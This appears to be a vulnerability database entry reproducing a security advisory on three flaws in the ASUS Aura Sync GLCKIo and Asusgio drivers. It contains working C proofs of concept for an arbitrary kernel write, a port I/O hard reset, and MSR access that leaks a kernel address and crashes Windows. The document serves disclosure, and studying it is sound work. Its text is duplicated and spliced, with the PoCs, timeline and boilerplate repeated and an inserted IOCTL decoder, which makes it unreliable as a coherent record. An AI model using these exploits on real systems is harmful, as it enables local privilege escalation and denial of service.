BOOL InitDriver()
{
    ghDriver = CreateFileA("\\\\.\\GLCKIo", GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL, NULL);
    if (ghDriver == INVALID_HANDLE_VALUE) {
        printf("Cannot get handle to GLCKIo driver - GetLastError:%d\n",
            GetLastError());
        return FALSE;
    }
    return TRUE;
}
int _tmain(int argc, _TCHAR* argv[])
{
    printf("ASUS Aura Sync PoC (arbitrary ring0 write)\n");
    if (!InitDriver()) {
        exit(0);
    }
    printf("press ENTER for instant BSOD\n");
    getchar();
    // A ring-0 store to address 0 faults the kernel: a crash is the
    // simplest demonstration of the write primitive.
    ArbitraryWriteDWORD(0, 0xffffffff);
    CloseHandle(ghDriver);
    return 0;
}
-----/
*7.2. *Port mapped I/O access**
[CVE-2018-18536]
Both GLCKIo and Asusgio expose functionality to read and write I/O ports.
This could be leveraged in a number of ways to ultimately run code with
elevated privileges.
/-----
// This harmless PoC only reboots the PC, much more sinister stuff
// would also be possible by abusing this functionality.
// Compile for 32bit!!! Asusgio apparently has a bug preventing this
// functionality to work unless IoIs32bitProcess == TRUE. They set rdx
// as a pointer instead of a port number on the in/out instruction...
// and they ONLY do this incorrectly in the x64 process specific code.(!?)
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <tchar.h>
// for \\.\glckio
#define IOCTL_GLCKIO_WRITEPORT 0x80102054
#define IOCTL_GLCKIO_READPORT 0x80102050
// for \\.\Asusgio
#define IOCTL_ASIO_PORTREADB 0xA0406400
#define IOCTL_ASIO_PORTWRITEB 0xA040A440
HANDLE ghDriver = 0;
typedef BYTE(*fnPMIOReadB)(WORD port);
typedef BYTE(*fnPMIOWriteB)(WORD port, BYTE value);
#pragma pack (push,1)
typedef struct {
    DWORD DriverIndex; // DriverEnum index
    BYTE DeviceName[MAX_PATH];
    fnPMIOReadB pPMIOReadB;
    fnPMIOWriteB pPMIOWriteB;
} AutoConfigStruct;
AutoConfigStruct gConfig = { 0 };
enum DriverEnum {
    ASIO = 1,
    GLCKIO,
};
typedef struct _ASIO_PORTIO_STRUCT {
    DWORD port;
    ULONG64 value;
} ASIO_PORTIO_STRUCT;
typedef struct _GLCKIO_PORTIO_STRUCT {
    WORD port;
    DWORD value;
    DWORD datalen;
} GLCKIO_PORTIO_STRUCT;
#pragma pack(pop)
// Sends the caller's 'inbuffer' with the given input length and returns
// the first byte of the driver's output buffer.
#define IOCTLMACRO(iocontrolcode, size) \
    BYTE outbuffer[0x30] = { 0 }; \
    DWORD returned = 0; \
    DeviceIoControl(ghDriver, (iocontrolcode), (LPVOID)&inbuffer, \
        (size), (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \
    return outbuffer[0];
BYTE GLCKIO_PMIOReadB(WORD port)
{
    GLCKIO_PORTIO_STRUCT inbuffer = { port, 0, 1 };
    IOCTLMACRO(IOCTL_GLCKIO_READPORT, 10)
}
BYTE GLCKIO_PMIOWriteB(WORD port, BYTE value)
{
    GLCKIO_PORTIO_STRUCT inbuffer = { port, value, 1 };
    IOCTLMACRO(IOCTL_GLCKIO_WRITEPORT, 10)
}
BYTE ASIO_PMIOReadB(WORD port)
{
    ASIO_PORTIO_STRUCT inbuffer = { port, 0 };
    IOCTLMACRO(IOCTL_ASIO_PORTREADB, 4)
}
BYTE ASIO_PMIOWriteB(WORD port, BYTE value)
{
    ASIO_PORTIO_STRUCT inbuffer = { port, value };
    IOCTLMACRO(IOCTL_ASIO_PORTWRITEB, 5)
}
// Hard reset through the chipset Reset Control Register at I/O port 0xCF9:
// clear SYS_RST/RST_CPU (bits 1-2), assert SYS_RST (bit 1), then assert
// RST_CPU and FULL_RST as well (bits 1-3), which triggers a full reset.
void Reboot()
{
    BYTE cf9 = gConfig.pPMIOReadB(0xcf9) & ~0x6;
    gConfig.pPMIOWriteB(0xcf9, cf9 | 2);
    Sleep(50);
    gConfig.pPMIOWriteB(0xcf9, cf9 | 0xe);
    Sleep(50);
}
// Opens whichever of the two devices is present and selects the matching
// port I/O wrappers.
BOOL InitDriver()
{
    const char *szDeviceNames[] = { "\\\\.\\Asusgio", "\\\\.\\GLCKIo" };
    BYTE i = 0;
    for (i = 0; i < 2; i++) {
        ghDriver = CreateFileA(szDeviceNames[i], GENERIC_READ | GENERIC_WRITE,
            FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING,
            FILE_ATTRIBUTE_NORMAL, NULL);
        if (ghDriver == INVALID_HANDLE_VALUE) {
            printf("Cannot get handle to driver object '%s' - GetLastError:%d\n",
                szDeviceNames[i], GetLastError());
            continue;
        }
        gConfig.DriverIndex = i + 1;
        strncpy((char *)gConfig.DeviceName, szDeviceNames[i], MAX_PATH - 1);
        break;
    }
    switch (gConfig.DriverIndex) {
    case ASIO:
        gConfig.pPMIOReadB = ASIO_PMIOReadB;
        gConfig.pPMIOWriteB = ASIO_PMIOWriteB;
        break;
    case GLCKIO:
        gConfig.pPMIOReadB = GLCKIO_PMIOReadB;
        gConfig.pPMIOWriteB = GLCKIO_PMIOWriteB;
        break;
    default:
        break;
    }
    return gConfig.DriverIndex ? TRUE : FALSE;
}
int _tmain(int argc, _TCHAR* argv[])
{
    printf("ASUS Aura Sync PoC (PMIO access)\n");
    if (!InitDriver()) {
        printf("InitDriver failed! - aborting...\n");
        exit(0);
    }
    printf("DeviceName: '%s' Handle: %p\n", gConfig.DeviceName,
        (void *)ghDriver);
    printf("press ENTER for hard reset...");
    getchar();
    Reboot();
    CloseHandle(ghDriver);
    return 0;
}
-----/
*7.3. *MSR Register access**
[CVE-2018-18535]
Asusgio exposes functionality to read and write Model Specific
Registers (MSRs). This could be leveraged to execute arbitrary ring-0
code.
Proof of Concept:
/-----
// This PoC demonstrates insecure access to MSRs by reading IA32_LSTAR
// register value (leaks a kernel function pointer bypassing KASLR) and
// then writing garbage to it (instant BSOD!)
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <tchar.h>
// for \\.\Asusgio
#define IOCTL_ASIO_RDMSR 0xA0406458
#define IOCTL_ASIO_WRMSR 0xA040A45C
HANDLE ghDriver = 0;
#pragma pack (push,1)
typedef struct _ASIO_MSRIO_STRUCT {
    DWORD reg;     // MSR index (the ECX operand of rdmsr/wrmsr)
    ULONG64 value; // 64-bit MSR value
} ASIO_MSRIO_STRUCT;
#pragma pack(pop)
// Sends the caller's 'inbuffer' with the given input length and returns
// the first ULONG64 of the driver's output buffer.
#define IOCTLMACRO(iocontrolcode, size) \
    ULONG64 outbuffer[2] = { 0 }; \
    DWORD returned = 0; \
    DeviceIoControl(ghDriver, (iocontrolcode), (LPVOID)&inbuffer, \
        (size), (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \
    return outbuffer[0];
ULONG64 ASIO_RDMSR(DWORD reg)
{
    ASIO_MSRIO_STRUCT inbuffer = { reg, 0 };
    IOCTLMACRO(IOCTL_ASIO_RDMSR, 4)
}
ULONG64 ASIO_WRMSR(DWORD reg, ULONG64 value)
{
    ASIO_MSRIO_STRUCT inbuffer = { reg, value };
    IOCTLMACRO(IOCTL_ASIO_WRMSR, 12)
}
BOOL InitDriver()
{
    ghDriver = CreateFileA("\\\\.\\Asusgio", GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL, NULL);
    if (ghDriver == INVALID_HANDLE_VALUE) {
        printf("Cannot get handle to driver object '%s' - GetLastError:%d\n",
            "\\\\.\\Asusgio", GetLastError());
        return FALSE;
    }
    return TRUE;
}
int _tmain(int argc, _TCHAR* argv[])
{
    printf("ASUS Aura Sync PoC (MSR access)\n");
    if (!InitDriver()) {
        printf("InitDriver failed! - aborting...\n");
        exit(0);
    }
    // IA32_LSTAR (0xC0000082) holds the SYSCALL entry point, so reading it
    // reveals where the kernel image is loaded.
    ULONG64 IA32_LSTAR = ASIO_RDMSR(0xC0000082);
    printf("IA32_LSTAR: %llx (should be nt!KiSystemCall64)\n", IA32_LSTAR);
    printf("press ENTER for instant BSOD\n");
    getchar();
    // Overwriting the SYSCALL entry point with garbage crashes the machine
    // on the next system call.
    ASIO_WRMSR(0xC0000082, 0xffff1111ffff2222);
    CloseHandle(ghDriver);
    return 0;
}
-----/
*8. *Report Timeline**
2017-11-27: SecureAuth sent an initial notification to ASUS, asking for
GPG keys.
2017-12-14: SecureAuth sent a second notification to ASUS.
2018-01-29: SecureAuth sent a third notification to ASUS.
2018-01-30: Asus acknowledged SecureAuth's e-mail and asked for a report
with technical information.
2018-01-31: SecureAuth sent Asus a draft version of the advisory.
2018-02-07: SecureAuth requested an update from Asus regarding the
reported vulnerabilities and a tentative schedule.
2018-02-14: SecureAuth again requested an update from Asus regarding the
reported vulnerabilities and a tentative schedule.
2018-02-21: Asus acknowledged SecureAuth's draft report and asked for
time for internal investigations.
2018-02-21: Asus answered saying that they were planning to update Aura
in April.
2018-02-21: SecureAuth thanked Asus for the feedback and requested regular
contact until the Aura update.
2018-03-19: SecureAuth asked for a status update.
2018-03-26: SecureAuth asked for a status update again.
2018-03-26: SecureAuth asked Asus to confirm whether this new version had
already been released.
2018-04-03: SecureAuth requested a status update.
2018-04-16: SecureAuth requested a confirmation from Asus.
2018-04-23: SecureAuth requested a confirmation from Asus again. However, this version didn't address the reported
vulnerabilities. For that reason, SecureAuth requested a clarification
about the case. In this context, SecureAuth requested a new clarification.
2018-07-03: SecureAuth requested a status update.
2018-12-18: Advisory CORE-2017-0012 published as 'user release'.
*9. *References**
[1] https://www.asus.com/support
*10. *About SecureAuth Labs**
SecureAuth Labs, the research arm of SecureAuth Corporation, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct research in several important areas of
computer security, including identity-related attacks, system
vulnerabilities and cyber-attack planning. Research includes problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. We regularly publish security
advisories, primary research, technical publications, research blogs,
project information, and shared software tools for public use at
http://www.secureauth.com.
*11. *About SecureAuth**
SecureAuth is leveraged by leading companies, their employees, their
customers and their partners to eliminate identity-related breaches.
As a leader in access management, identity governance, and penetration
testing, SecureAuth is powering an identity security revolution by
enabling people and devices to intelligently and adaptively access
systems and data, while effectively keeping bad actors from doing harm.
By ensuring the continuous assessment of risk and enablement of trust,
SecureAuth's highly flexible Identity Security Automation (ISA) platform
makes it easier for organizations to prevent the misuse of credentials
and exponentially reduce the enterprise threat surface. To learn more,
visit www.secureauth.com, call (949) 777-6959, or email us at
info@secureauth.com
*12. *Disclaimer**
The contents of this advisory are copyright (c) 2018 SecureAuth, and are
licensed under a Creative Commons Attribution Non-Commercial Share-Alike
3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
| VAR-201812-0061 | CVE-2018-18537 | ASUS Aura Sync Vulnerabilities related to security functions |
CVSS V2: 2.1 CVSS V3: 5.5 Severity: MEDIUM |
The GLCKIo low-level driver in ASUS Aura Sync v1.07.22 and earlier exposes a path to write an arbitrary DWORD to an arbitrary address. ASUS Aura Sync contains vulnerabilities related to security features. Information may be tampered with.
Successfully exploiting these issues may allow an attacker to execute arbitrary code in the context of the affected application and gain elevated privileges. Failed exploits will result in denial-of-service conditions.
SecureAuth - SecureAuth Labs Advisory
http://www.secureauth.com/
ASUS Drivers Elevation of Privilege Vulnerabilities
*1. *Advisory Information**
Title: ASUS Drivers Elevation of Privilege Vulnerabilities
Advisory ID: CORE-2017-0012
Advisory URL:
http://www.secureauth.com/labs/advisories/asus-drivers-elevation-privilege-vulnerabilities
Date published: 2018-12-18
Date of last update: 2018-12-18
Vendors contacted: Asus
Release mode: User release
*2. *Vulnerability Information**
Class: Exposed IOCTL with Insufficient Access Control [CWE-782],
Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL
with Insufficient Access Control [CWE-782]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2018-18537, CVE-2018-18536, CVE-2018-18535
*3. *Vulnerability Description**
ASUS offers several drivers and utilities [1] in order to give the user
more control over certain settings and functions of the motherboard.
In particular, ASUS Aura Sync takes RGB lighting beyond the checkbox,
combining and controlling the LEDs of all your Aura-enabled products
from a single application to achieve perfect, synchronized harmony. From
motherboards and RGB strips to graphics cards and beyond, Aura Sync
enables a veritable symphony of light for ultimate personalization.
*4. *Vulnerable Packages**
. ASUS Aura Sync v1.07.22 and earlier.
*5. *Vendor Information, Solutions and Workarounds**
The vendor did not provide fixes or workaround information.
*6. *Credits**
These vulnerabilities were discovered and researched by Diego Juarez.
The publication of this advisory was coordinated by Leandro Cuozzo from
SecureAuth Advisories Team.
*7. *Technical Description / Proof of Concept Code**
Aura Sync is ASUS's command software for all their line of recent RGB
lighting enabled devices (motherboards/graphics cards/keyboards/mice/etc).
The main subject of this advisory are two of the device drivers
installed/loaded by the Aura Sync application, referred to from now on as
"Asusgio" and "GLCKIo". A default installation allows non-privileged user
processes (even those running at LOW INTEGRITY) to obtain a HANDLE to these
drivers and issue IOCTL codes to them.
The following sections describe the problems found.
*7.1. *Arbitrary ring0 write**
[CVE-2018-18537]
There is a path in the processing of IOCTL_GLCKIO_READPORT (0x80102050)
on GLCKIo that leads to a write of an arbitrary DWORD to an arbitrary address.
/-----
.text:FFFFF800B09F13FE loc_FFFFF800B09F13FE:
.text:FFFFF800B09F13FE mov rax, [rsp+0C8h+var_38] ; CONTROLLED VALUE
.text:FFFFF800B09F1406 mov ecx, [rsp+0C8h+var_56] ; CONTROLLED VALUE
.text:FFFFF800B09F140A mov [rax], ecx ; Arbitrary DWORD sized write!
.text:FFFFF800B09F140C mov rax, [rsp+0C8h+Irp]
.text:FFFFF800B09F1414 mov qword ptr [rax+38h], 4 ; Irp->IoStatus.Information = 4
.text:FFFFF800B09F141C jmp short loc_FFFFF800B09F142D
-----/
Proof of Concept:
/-----
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <tchar.h>
HANDLE ghDriver = 0;
#define IOCTL_GLCKIO_VMWRITE 0x80102050
// Input buffer layout as recovered from the driver; the purpose of the
// fields is unknown except where noted below.
typedef struct _STRUCT_GLCKIO_VMWRITE {
    WORD unk0;
    DWORD unk1_1;
    WORD unk1_2;
    ULONG64 unk2;
    ULONG64 unk3;
    ULONG64 unk4;
    ULONG64 unk5;
    ULONG64 unk6;
} STRUCT_GLCKIO_VMWRITE;
// Writes 'value' to the kernel-mode address 'dest' through the unchecked
// store shown in the disassembly above.
BOOL ArbitraryWriteDWORD(ULONG64 dest, DWORD value)
{
    STRUCT_GLCKIO_VMWRITE mystructIn = { 0 };
    mystructIn.unk0 = 0xf11;   // value the handler expects here (purpose not documented)
    mystructIn.unk1_1 = value; // value
    mystructIn.unk5 = dest;    // address
    STRUCT_GLCKIO_VMWRITE mystructOut = { 0 };
    DWORD returned = 0;
    DeviceIoControl(ghDriver, IOCTL_GLCKIO_VMWRITE, (LPVOID)&mystructIn,
        sizeof(mystructIn), (LPVOID)&mystructOut, sizeof(mystructOut),
        &returned, NULL);
    return (BOOL)(returned != 0);
}
BOOL InitDriver()
{
    ghDriver = CreateFileA("\\\\.\\GLCKIo", GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL, NULL);
    if (ghDriver == INVALID_HANDLE_VALUE) {
        printf("Cannot get handle to GLCKIo driver - GetLastError:%d\n",
            GetLastError());
        return FALSE;
    }
    return TRUE;
}
int _tmain(int argc, _TCHAR* argv[])
{
    printf("ASUS Aura Sync PoC (arbitrary ring0 write)\n");
    if (!InitDriver()) {
        exit(0);
    }
    printf("press ENTER for instant BSOD\n");
    getchar();
    // A ring-0 store to address 0 faults the kernel: a crash is the
    // simplest demonstration of the write primitive.
    ArbitraryWriteDWORD(0, 0xffffffff);
    CloseHandle(ghDriver);
    return 0;
}
-----/
*7.2. *Port mapped I/O access**
[CVE-2018-18536]
Both GLCKIo and Asusgio expose functionality to read and write I/O ports.
This could be leveraged in a number of ways to ultimately run code with
elevated privileges.
/-----
// This harmless PoC only reboots the PC, much more sinister stuff
// would also be possible by abusing this functionality.
// Compile for 32bit!!! Asusgio apparently has a bug preventing this
// functionality to work unless IoIs32bitProcess == TRUE. They set rdx
// as a pointer instead of a port number on the in/out instruction...
// and they ONLY do this incorrectly in the x64 process specific code.(!?)
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <tchar.h>
// for \\.\glckio
#define IOCTL_GLCKIO_WRITEPORT 0x80102054
#define IOCTL_GLCKIO_READPORT 0x80102050
// for \\.\Asusgio
#define IOCTL_ASIO_PORTREADB 0xA0406400
#define IOCTL_ASIO_PORTWRITEB 0xA040A440
HANDLE ghDriver = 0;
typedef BYTE(*fnPMIOReadB)(WORD port);
typedef BYTE(*fnPMIOWriteB)(WORD port, BYTE value);
#pragma pack (push,1)
typedef struct {
    DWORD DriverIndex; // DriverEnum index
    BYTE DeviceName[MAX_PATH];
    fnPMIOReadB pPMIOReadB;
    fnPMIOWriteB pPMIOWriteB;
} AutoConfigStruct;
AutoConfigStruct gConfig = { 0 };
enum DriverEnum {
    ASIO = 1,
    GLCKIO,
};
typedef struct _ASIO_PORTIO_STRUCT {
    DWORD port;
    ULONG64 value;
} ASIO_PORTIO_STRUCT;
typedef struct _GLCKIO_PORTIO_STRUCT {
    WORD port;
    DWORD value;
    DWORD datalen;
} GLCKIO_PORTIO_STRUCT;
#pragma pack(pop)
// Sends the caller's 'inbuffer' with the given input length and returns
// the first byte of the driver's output buffer.
#define IOCTLMACRO(iocontrolcode, size) \
    BYTE outbuffer[0x30] = { 0 }; \
    DWORD returned = 0; \
    DeviceIoControl(ghDriver, (iocontrolcode), (LPVOID)&inbuffer, \
        (size), (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \
    return outbuffer[0];
BYTE GLCKIO_PMIOReadB(WORD port)
{
    GLCKIO_PORTIO_STRUCT inbuffer = { port, 0, 1 };
    IOCTLMACRO(IOCTL_GLCKIO_READPORT, 10)
}
BYTE GLCKIO_PMIOWriteB(WORD port, BYTE value)
{
    GLCKIO_PORTIO_STRUCT inbuffer = { port, value, 1 };
    IOCTLMACRO(IOCTL_GLCKIO_WRITEPORT, 10)
}
BYTE ASIO_PMIOReadB(WORD port)
{
    ASIO_PORTIO_STRUCT inbuffer = { port, 0 };
    IOCTLMACRO(IOCTL_ASIO_PORTREADB, 4)
}
BYTE ASIO_PMIOWriteB(WORD port, BYTE value)
{
    ASIO_PORTIO_STRUCT inbuffer = { port, value };
    IOCTLMACRO(IOCTL_ASIO_PORTWRITEB, 5)
}
// Hard reset through the chipset Reset Control Register at I/O port 0xCF9:
// clear SYS_RST/RST_CPU (bits 1-2), assert SYS_RST (bit 1), then assert
// RST_CPU and FULL_RST as well (bits 1-3), which triggers a full reset.
void Reboot()
{
    BYTE cf9 = gConfig.pPMIOReadB(0xcf9) & ~0x6;
    gConfig.pPMIOWriteB(0xcf9, cf9 | 2);
    Sleep(50);
    gConfig.pPMIOWriteB(0xcf9, cf9 | 0xe);
    Sleep(50);
}
// Opens whichever of the two devices is present and selects the matching
// port I/O wrappers.
BOOL InitDriver()
{
    const char *szDeviceNames[] = { "\\\\.\\Asusgio", "\\\\.\\GLCKIo" };
    BYTE i = 0;
    for (i = 0; i < 2; i++) {
        ghDriver = CreateFileA(szDeviceNames[i], GENERIC_READ | GENERIC_WRITE,
            FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING,
            FILE_ATTRIBUTE_NORMAL, NULL);
        if (ghDriver == INVALID_HANDLE_VALUE) {
            printf("Cannot get handle to driver object '%s' - GetLastError:%d\n",
                szDeviceNames[i], GetLastError());
            continue;
        }
        gConfig.DriverIndex = i + 1;
        strncpy((char *)gConfig.DeviceName, szDeviceNames[i], MAX_PATH - 1);
        break;
    }
    switch (gConfig.DriverIndex) {
    case ASIO:
        gConfig.pPMIOReadB = ASIO_PMIOReadB;
        gConfig.pPMIOWriteB = ASIO_PMIOWriteB;
        break;
    case GLCKIO:
        gConfig.pPMIOReadB = GLCKIO_PMIOReadB;
        gConfig.pPMIOWriteB = GLCKIO_PMIOWriteB;
        break;
    default:
        break;
    }
    return gConfig.DriverIndex ? TRUE : FALSE;
}
int _tmain(int argc, _TCHAR* argv[])
{
    printf("ASUS Aura Sync PoC (PMIO access)\n");
    if (!InitDriver()) {
        printf("InitDriver failed! - aborting...\n");
        exit(0);
    }
    printf("DeviceName: '%s' Handle: %p\n", gConfig.DeviceName,
        (void *)ghDriver);
    printf("press ENTER for hard reset...");
    getchar();
    Reboot();
    CloseHandle(ghDriver);
    return 0;
}
-----/
*7.3. *MSR Register access**
[CVE-2018-18535]
Asusgio exposes functionality to read and write Model Specific
Registers (MSRs). This could be leveraged to execute arbitrary ring-0
code.
Proof of Concept:
/-----
// This PoC demonstrates insecure access to MSRs by reading IA32_LSTAR
// register value (leaks a kernel function pointer bypassing KASLR) and
// then writing garbage to it (instant BSOD!)
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <tchar.h>
// for \\.\Asusgio
#define IOCTL_ASIO_RDMSR 0xA0406458
#define IOCTL_ASIO_WRMSR 0xA040A45C
HANDLE ghDriver = 0;
#pragma pack (push,1)
typedef struct _ASIO_MSRIO_STRUCT {
    DWORD reg;     // MSR index (the ECX operand of rdmsr/wrmsr)
    ULONG64 value; // 64-bit MSR value
} ASIO_MSRIO_STRUCT;
#pragma pack(pop)
// Sends the caller's 'inbuffer' with the given input length and returns
// the first ULONG64 of the driver's output buffer.
#define IOCTLMACRO(iocontrolcode, size) \
    ULONG64 outbuffer[2] = { 0 }; \
    DWORD returned = 0; \
    DeviceIoControl(ghDriver, (iocontrolcode), (LPVOID)&inbuffer, \
        (size), (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \
    return outbuffer[0];
ULONG64 ASIO_RDMSR(DWORD reg)
{
    ASIO_MSRIO_STRUCT inbuffer = { reg, 0 };
    IOCTLMACRO(IOCTL_ASIO_RDMSR, 4)
}
ULONG64 ASIO_WRMSR(DWORD reg, ULONG64 value)
{
    ASIO_MSRIO_STRUCT inbuffer = { reg, value };
    IOCTLMACRO(IOCTL_ASIO_WRMSR, 12)
}
BOOL InitDriver()
{
    ghDriver = CreateFileA("\\\\.\\Asusgio", GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL, NULL);
    if (ghDriver == INVALID_HANDLE_VALUE) {
        printf("Cannot get handle to driver object '%s' - GetLastError:%d\n",
            "\\\\.\\Asusgio", GetLastError());
        return FALSE;
    }
    return TRUE;
}
int _tmain(int argc, _TCHAR* argv[])
{
    printf("ASUS Aura Sync PoC (MSR access)\n");
    if (!InitDriver()) {
        printf("InitDriver failed! - aborting...\n");
        exit(0);
    }
    // IA32_LSTAR (0xC0000082) holds the SYSCALL entry point, so reading it
    // reveals where the kernel image is loaded.
    ULONG64 IA32_LSTAR = ASIO_RDMSR(0xC0000082);
    printf("IA32_LSTAR: %llx (should be nt!KiSystemCall64)\n", IA32_LSTAR);
    printf("press ENTER for instant BSOD\n");
    getchar();
    // Overwriting the SYSCALL entry point with garbage crashes the machine
    // on the next system call.
    ASIO_WRMSR(0xC0000082, 0xffff1111ffff2222);
    CloseHandle(ghDriver);
    return 0;
}
-----/
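A point worth making explicit about all three PoCs above: the IOCTL codes they send carry a RequiredAccess field, but that field only says which rights the handle must have been opened with, and every PoC opens the device with GENERIC_READ | GENERIC_WRITE. So FILE_READ_ACCESS or FILE_WRITE_ACCESS on the Asusgio codes is no obstacle; the only gate is the device object's DACL, which the advisory says admits even low-integrity callers. All six codes also use METHOD_BUFFERED, under which the I/O manager copies the input into a kernel SystemBuffer but does not check its length against whatever structure the handler reads, which is why the PoCs can pass 4 or 5 bytes for a 12-byte ASIO_PORTIO_STRUCT without the driver objecting. The decoder below is an added example in C (not code from the advisory, from SecureAuth or from ASUS) that pulls these fields out of the codes quoted above; the CTL_CODE bit layout is the documented Windows one, and the two helper functions at the end are an illustrative model of the documented rules, not Windows code.

```c
#include <stdint.h>
#include <stdio.h>

/* Field values from the CTL_CODE macro (bits 0-1 and bits 14-15). */
enum ioctl_method { METHOD_BUFFERED = 0, METHOD_IN_DIRECT = 1,
                    METHOD_OUT_DIRECT = 2, METHOD_NEITHER = 3 };
enum ioctl_access { FILE_ANY_ACCESS = 0, FILE_READ_ACCESS = 1,
                    FILE_WRITE_ACCESS = 2, FILE_READ_WRITE_ACCESS = 3 };

struct ioctl_fields {
    uint16_t device_type; /* bits 16-31; 0x8000 and above are vendor-defined */
    uint16_t function;    /* bits 2-13;  0x800 and above are vendor-defined  */
    uint8_t  access;      /* bits 14-15: rights the handle must hold          */
    uint8_t  method;      /* bits 0-1:   how the buffers reach the driver     */
};

/* CTL_CODE(DeviceType, Function, Method, Access) =
 *   (DeviceType << 16) | (Access << 14) | (Function << 2) | Method */
struct ioctl_fields decode_ioctl(uint32_t code)
{
    struct ioctl_fields f;
    f.device_type = (uint16_t)(code >> 16);
    f.access      = (uint8_t)((code >> 14) & 0x3);
    f.function    = (uint16_t)((code >> 2) & 0xFFF);
    f.method      = (uint8_t)(code & 0x3);
    return f;
}

uint32_t encode_ioctl(uint16_t device_type, uint16_t function,
                      uint8_t method, uint8_t access)
{
    return ((uint32_t)device_type << 16) | ((uint32_t)(access & 0x3) << 14)
         | ((uint32_t)(function & 0xFFF) << 2) | (uint32_t)(method & 0x3);
}

const char *method_name(uint8_t method)
{
    static const char *names[] = { "METHOD_BUFFERED", "METHOD_IN_DIRECT",
                                   "METHOD_OUT_DIRECT", "METHOD_NEITHER" };
    return names[method & 0x3];
}

const char *access_name(uint8_t access)
{
    static const char *names[] = { "FILE_ANY_ACCESS", "FILE_READ_ACCESS",
                                   "FILE_WRITE_ACCESS", "FILE_READ_WRITE_ACCESS" };
    return names[access & 0x3];
}

/* The I/O manager's only check on RequiredAccess: was the handle opened
 * with the matching rights? A handle opened GENERIC_READ | GENERIC_WRITE,
 * as in the PoCs, passes for every value. Returns 1 when the call is let
 * through. (Illustrative model of the documented rule, not Windows code.) */
int handle_satisfies(uint8_t access, int opened_read, int opened_write)
{
    switch (access & 0x3) {
    case FILE_ANY_ACCESS:   return 1;
    case FILE_READ_ACCESS:  return opened_read;
    case FILE_WRITE_ACCESS: return opened_write;
    default:                return opened_read && opened_write;
    }
}

/* With METHOD_BUFFERED the handler gets a SystemBuffer copy of the input
 * plus InputBufferLength; nothing checks that length against the structure
 * the handler reads, so the handler must do it before touching any field. */
int input_length_ok(uint32_t input_buffer_length, uint32_t struct_size)
{
    return input_buffer_length >= struct_size;
}

int main(void)
{
    /* The codes quoted in the advisory's PoCs. */
    static const struct { const char *name; uint32_t code; } codes[] = {
        { "IOCTL_GLCKIO_READPORT",  0x80102050u },
        { "IOCTL_GLCKIO_WRITEPORT", 0x80102054u },
        { "IOCTL_ASIO_PORTREADB",   0xA0406400u },
        { "IOCTL_ASIO_PORTWRITEB",  0xA040A440u },
        { "IOCTL_ASIO_RDMSR",       0xA0406458u },
        { "IOCTL_ASIO_WRMSR",       0xA040A45Cu },
    };
    size_t i;
    for (i = 0; i < sizeof codes / sizeof codes[0]; i++) {
        struct ioctl_fields f = decode_ioctl(codes[i].code);
        printf("%-22s 0x%08X type=0x%04X func=0x%03X %s %s reachable_with_rw_handle=%d\n",
               codes[i].name, (unsigned)codes[i].code, (unsigned)f.device_type,
               (unsigned)f.function, method_name(f.method), access_name(f.access),
               handle_satisfies(f.access, 1, 1));
    }
    return 0;
}
```

When triaging a third-party driver, run the decoder over every code the user-mode client sends: a vendor-defined device type, METHOD_BUFFERED or METHOD_NEITHER, and a permissive device DACL together mean that every argument the handler reads, including lengths, addresses, port numbers and MSR indices, arrives straight from an unprivileged caller and has to be validated by the driver itself.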
*8. *Report Timeline**
2017-11-27: SecureAuth sent an initial notification to ASUS, asking for
GPG keys.
2017-12-14: SecureAuth sent a second notification to ASUS.
2018-01-29: SecureAuth sent a third notification to ASUS.
2018-01-30: Asus acknowledged SecureAuth's e-mail and asked for a report
with technical information.
2018-01-31: SecureAuth sent Asus a draft version of the advisory.
2018-02-07: SecureAuth requested an update from Asus regarding the
reported vulnerabilities and a tentative schedule.
2018-02-14: SecureAuth again requested an update from Asus regarding the
reported vulnerabilities and a tentative schedule.
2018-02-21: Asus acknowledged SecureAuth's draft report and asked for
time for internal investigations.
2018-02-21: Asus answered saying that they were planning to update Aura
in April.
2018-02-21: SecureAuth thanked Asus for the feedback and requested regular
contact until the Aura update.
2018-03-19: SecureAuth asked for a status update.
2018-03-26: SecureAuth asked for a status update again.
2018-03-26: SecureAuth asked Asus to confirm whether this new version had
already been released.
2018-04-03: SecureAuth requested a status update.
2018-04-16: SecureAuth requested a confirmation from Asus.
2018-04-23: SecureAuth requested a confirmation from Asus again. However, this version didn't address the reported
vulnerabilities. For that reason, SecureAuth requested a clarification
about the case. In this context, SecureAuth requested a new clarification.
2018-07-03: SecureAuth requested a status update.
2018-12-18: Advisory CORE-2017-0012 published as 'user release'.
*9. *References**
[1] https://www.asus.com/support
*10. *About SecureAuth Labs**
SecureAuth Labs, the research arm of SecureAuth Corporation, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct research in several important areas of
computer security, including identity-related attacks, system
vulnerabilities and cyber-attack planning. Research includes problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. We regularly publish security
advisories, primary research, technical publications, research blogs,
project information, and shared software tools for public use at
http://www.secureauth.com.
